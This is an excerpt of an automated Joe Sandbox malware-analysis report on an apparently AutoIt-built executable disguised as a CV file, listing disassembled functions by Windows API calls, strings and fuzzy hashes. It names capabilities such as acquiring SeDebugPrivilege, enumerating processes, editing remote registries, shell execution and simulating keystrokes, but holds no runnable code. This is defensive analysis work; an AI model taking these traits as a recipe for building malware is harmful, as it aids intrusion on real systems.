                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                        • String ID: SeDebugPrivilege
                                                                                        • API String ID: 2533919879-2896544425
                                                                                        • Opcode ID: bd3aa6ad854528d38664c8ce6ba81aff591851d1d0dd723241c7677fd12699f7
                                                                                        • Instruction ID: 56dbbf1d40907292cf64f93f9d273a5532ee55ed7d2720a649ec037f990dda5b
                                                                                        • Opcode Fuzzy Hash: bd3aa6ad854528d38664c8ce6ba81aff591851d1d0dd723241c7677fd12699f7
                                                                                        • Instruction Fuzzy Hash: 2F41BF75600210AFDB06EF94C8A5FAEB7A5AF44710F05805CF9069F3D2DBB4A9048F51
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 003C58B8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2457776203-404129466
                                                                                        • Opcode ID: d2e0aeb9f5f22a9e6439e1eab73e93111b30d369edda588dc7ab0109868c07f2
                                                                                        • Instruction ID: 1c7144356dfa7dcc68199a451a1b31bad299fd55192a40ff6f9570402ca06783
                                                                                        • Opcode Fuzzy Hash: d2e0aeb9f5f22a9e6439e1eab73e93111b30d369edda588dc7ab0109868c07f2
                                                                                        • Instruction Fuzzy Hash: 9511D836709B42BEE7165A549C82F6A339CDF29720F20003EF510F6281E764BE804768
                                                                                        APIs
                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 003CA806
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafeVartype
                                                                                        • String ID:
                                                                                        • API String ID: 1725837607-0
                                                                                        • Opcode ID: 332b97f14b09141ee7969cdd67973bf5d24ed0115cb6fed7732ddc99a9eb9722
                                                                                        • Instruction ID: 0be06bcdf865d2ac3f9ca38732a76dc864713de7182453252c0b2ea102b601eb
                                                                                        • Opcode Fuzzy Hash: 332b97f14b09141ee7969cdd67973bf5d24ed0115cb6fed7732ddc99a9eb9722
                                                                                        • Instruction Fuzzy Hash: DDC16B75A0461A9FDB02CF98D585BAEBBF4FF08319F20406EE606EB251D734AD41CB91
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003C6B63
                                                                                        • LoadStringW.USER32(00000000), ref: 003C6B6A
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003C6B80
                                                                                        • LoadStringW.USER32(00000000), ref: 003C6B87
                                                                                        • _wprintf.LIBCMT ref: 003C6BAD
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003C6BCB
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 003C6BA8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 3648134473-3128320259
                                                                                        • Opcode ID: 068a78d5f62f97d1eef208651743ca3f89f125df21e09afbec46791eeb39da40
                                                                                        • Instruction ID: 3a3571c89290d16e09e3fa6b3d087bdf8f52e8cf310e37601c283472f66f277c
                                                                                        • Opcode Fuzzy Hash: 068a78d5f62f97d1eef208651743ca3f89f125df21e09afbec46791eeb39da40
                                                                                        • Instruction Fuzzy Hash: 5801E6F69002187FE711ABD49D89FFB776CD708305F0045A5B745E6041EA749E888F75
                                                                                        APIs
                                                                                          • Part of subcall function 003E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003E2BB5,?,?), ref: 003E3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E2BF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharConnectRegistryUpper
                                                                                        • String ID:
                                                                                        • API String ID: 2595220575-0
                                                                                        • Opcode ID: 1def700ce837698ee835c2027d2538b3446df4569047c31c9a78e0354126e325
                                                                                        • Instruction ID: ed75853d539402254688d1c4a44d6e0270297fd9d04f3d16ce1df140e4eae334
                                                                                        • Opcode Fuzzy Hash: 1def700ce837698ee835c2027d2538b3446df4569047c31c9a78e0354126e325
                                                                                        • Instruction Fuzzy Hash: 87918A316042019FCB02EF55C891B6FB7E9FF88314F04895DF99A9B2A1DB70E905CB42
                                                                                        APIs
                                                                                        • select.WSOCK32 ref: 003D9691
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D969E
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 003D96C8
                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003D96E9
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D96F8
                                                                                        • inet_ntoa.WSOCK32(?), ref: 003D9765
                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 003D97AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$htonsinet_ntoaselect
                                                                                        • String ID:
                                                                                        • API String ID: 500251541-0
                                                                                        • Opcode ID: 5fd7bb3edb40734799eaa3369c64945eda8c18382f050c173116df5caebca852
                                                                                        • Instruction ID: b27d5b0aac42c9a1c0fbd338367bf847cb33be5ecc758bc23179352e46b1a304
                                                                                        • Opcode Fuzzy Hash: 5fd7bb3edb40734799eaa3369c64945eda8c18382f050c173116df5caebca852
                                                                                        • Instruction Fuzzy Hash: A471AC32504200ABC716EF64DC85F6BB7E9EF85714F104A2EF556AB2A1EB30DD04CB62
                                                                                        APIs
                                                                                        • __mtinitlocknum.LIBCMT ref: 003AA991
                                                                                          • Part of subcall function 003A7D7C: __FF_MSGBANNER.LIBCMT ref: 003A7D91
                                                                                          • Part of subcall function 003A7D7C: __NMSG_WRITE.LIBCMT ref: 003A7D98
                                                                                          • Part of subcall function 003A7D7C: __malloc_crt.LIBCMT ref: 003A7DB8
                                                                                        • __lock.LIBCMT ref: 003AA9A4
                                                                                        • __lock.LIBCMT ref: 003AA9F0
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00436DE0,00000018,003B5E7B,?,00000000,00000109), ref: 003AAA0C
                                                                                        • EnterCriticalSection.KERNEL32(8000000C,00436DE0,00000018,003B5E7B,?,00000000,00000109), ref: 003AAA29
                                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 003AAA39
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1422805418-0
                                                                                        • Opcode ID: 850fd5b4fc1f24a93a9208fcbbd3be889c9f6b7a3642ad2134d2a099ec62d944
                                                                                        • Instruction ID: 7cb9c501113678424da07a356704d8f655cbe058091b37023afea48d1815bc6a
                                                                                        • Opcode Fuzzy Hash: 850fd5b4fc1f24a93a9208fcbbd3be889c9f6b7a3642ad2134d2a099ec62d944
                                                                                        • Instruction Fuzzy Hash: 7D415872A00A059BEB12DFA8CA4575CB7F0EF03334F15822DE525AF2D2D7749810CB96
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 003E8EE4
                                                                                        • GetDC.USER32(00000000), ref: 003E8EEC
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003E8EF7
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 003E8F03
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 003E8F3F
                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003E8F50
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003EBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 003E8F8A
                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003E8FAA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3864802216-0
                                                                                        • Opcode ID: d23f006f68b524ce3e2b95602ae3bd69eb7624ed00b473ac85a25a27196b3cee
                                                                                        • Instruction ID: c4bc0ee46edde697e14fce38f8881368f512803c4e9cc6e95f41dd2393d39312
                                                                                        • Opcode Fuzzy Hash: d23f006f68b524ce3e2b95602ae3bd69eb7624ed00b473ac85a25a27196b3cee
                                                                                        • Instruction Fuzzy Hash: 5131C072500214BFEB118F94CD49FEB3BADEF49715F044164FE08EA191CA759842CB74
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 003F016D
                                                                                        • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 003F038D
                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003F03AB
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 003F03D6
                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003F03FF
                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 003F0421
                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 003F0440
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                        • String ID:
                                                                                        • API String ID: 3356174886-0
                                                                                        • Opcode ID: c4ffe4e49dba205e456ef72845f3bdae2f548dd313ab022c5230b16460d584eb
                                                                                        • Instruction ID: be009657a9836d945f0d20836f57ffacdd7118647e41e0c1e50cd6612f70e0e8
                                                                                        • Opcode Fuzzy Hash: c4ffe4e49dba205e456ef72845f3bdae2f548dd313ab022c5230b16460d584eb
                                                                                        • Instruction Fuzzy Hash: 0BA1AE3960061AEBDB1DCF6CCA857BDBBB1BF08741F058126EE54AB291D734AD50CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8af834274bd7cb910bc6b78042b011c290de8204194cc389c1c58f0ba4f14ff6
                                                                                        • Instruction ID: 62235f7b977e653ea5042881450ce1ca025470191ea46c16f665653e2c4eed93
                                                                                        • Opcode Fuzzy Hash: 8af834274bd7cb910bc6b78042b011c290de8204194cc389c1c58f0ba4f14ff6
                                                                                        • Instruction Fuzzy Hash: 9C717E71900509EFDF06CF98CC48ABEBB78FF85314F148259F916AA251C730AA11DFA5
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003E225A
                                                                                        • _memset.LIBCMT ref: 003E2323
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 003E2368
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                          • Part of subcall function 0039C6F4: _wcscpy.LIBCMT ref: 0039C717
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003E242F
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 003E243E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                        • String ID: @
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 003C3DE7
                                                                                        • GetKeyboardState.USER32(?), ref: 003C3DFC
                                                                                        • SetKeyboardState.USER32(?), ref: 003C3E5D
                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 003C3E8B
                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 003C3EAA
                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 003C3EF0
                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003C3F13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • GetParent.USER32(00000000), ref: 003C3C02
                                                                                        • GetKeyboardState.USER32(?), ref: 003C3C17
                                                                                        • SetKeyboardState.USER32(?), ref: 003C3C78
                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003C3CA4
                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003C3CC1
                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003C3D05
                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003C3D26
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 003E3DA1
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E3DCB
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 003E3E80
                                                                                          • Part of subcall function 003E3D72: RegCloseKey.ADVAPI32(?), ref: 003E3DE8
                                                                                          • Part of subcall function 003E3D72: FreeLibrary.KERNEL32(?), ref: 003E3E3A
                                                                                          • Part of subcall function 003E3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003E3E5D
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 003E3E25
                                                                                        Similarity
                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003E8FE7
                                                                                        • GetWindowLongW.USER32(0185E6C0,000000F0), ref: 003E901A
                                                                                        • GetWindowLongW.USER32(0185E6C0,000000F0), ref: 003E904F
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003E9081
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003E90AB
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003E90BC
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003E90D6
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageSend
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003C08F2
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003C0918
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 003C091B
                                                                                        • SysAllocString.OLEAUT32(?), ref: 003C0939
                                                                                        • SysFreeString.OLEAUT32(?), ref: 003C0942
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 003C0967
                                                                                        • SysAllocString.OLEAUT32(?), ref: 003C0975
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003C09CB
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003C09F1
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 003C09F4
                                                                                        • SysAllocString.OLEAUT32 ref: 003C0A15
                                                                                        • SysFreeString.OLEAUT32 ref: 003C0A1E
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 003C0A38
                                                                                        • SysAllocString.OLEAUT32(?), ref: 003C0A46
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        APIs
                                                                                          • Part of subcall function 0039D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0039D1BA
                                                                                          • Part of subcall function 0039D17C: GetStockObject.GDI32(00000011), ref: 0039D1CE
                                                                                          • Part of subcall function 0039D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0039D1D8
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003EA32D
                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003EA33A
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003EA345
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003EA354
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003EA360
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 1025951953-3636473452
                                                                                        • Opcode ID: 9a60d9eb2e80ee8bad02a281693ae44d1ecec323e9c1241599dc148c113c06b2
                                                                                        • Instruction ID: 90d285e76bc547d8d30246b8a796ac7e563c3ce81de1aa790a4d32bcecd08508
                                                                                        • Opcode Fuzzy Hash: 9a60d9eb2e80ee8bad02a281693ae44d1ecec323e9c1241599dc148c113c06b2
                                                                                        • Instruction Fuzzy Hash: 1611D3B1100129BEEF115F61CC85EE77F6DFF08398F014215BA04A60A0C772AC21DBA4
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 0039CCF6
                                                                                        • GetWindowRect.USER32(?,?), ref: 0039CD37
                                                                                        • ScreenToClient.USER32(?,?), ref: 0039CD5F
                                                                                        • GetClientRect.USER32(?,?), ref: 0039CE8C
                                                                                        • GetWindowRect.USER32(?,?), ref: 0039CEA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                        • String ID:
                                                                                        • API String ID: 1296646539-0
                                                                                        • Opcode ID: 15ee829f600a0ebc1e2fd2a7ec3854663678788908c7175f3db13a40fd0dfa9a
                                                                                        • Instruction ID: d0aed3ac14399a3fe86a3d07d46ff1e7fb559d251c2304a4f672e2d82024176b
                                                                                        • Opcode Fuzzy Hash: 15ee829f600a0ebc1e2fd2a7ec3854663678788908c7175f3db13a40fd0dfa9a
                                                                                        • Instruction Fuzzy Hash: 8AB18E7991024ADBDF11CFA9C5807EEBBB1FF08300F159529ED5AEB650DB30AA50CB64
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 003E1C18
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 003E1C26
                                                                                        • __wsplitpath.LIBCMT ref: 003E1C54
                                                                                          • Part of subcall function 003A1DFC: __wsplitpath_helper.LIBCMT ref: 003A1E3C
                                                                                        • _wcscat.LIBCMT ref: 003E1C69
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 003E1CDF
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 003E1CF1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                        • String ID:
                                                                                        • API String ID: 1380811348-0
                                                                                        • Opcode ID: 210cb9486d0d1012cdd4c311d5402e1254f98ca2c8ac889b61043ad53a2bfff4
                                                                                        • Instruction ID: f1de5a37747ea562b1f36862e13e1eeb15403973d42625113d98aea645e79562
                                                                                        • Opcode Fuzzy Hash: 210cb9486d0d1012cdd4c311d5402e1254f98ca2c8ac889b61043ad53a2bfff4
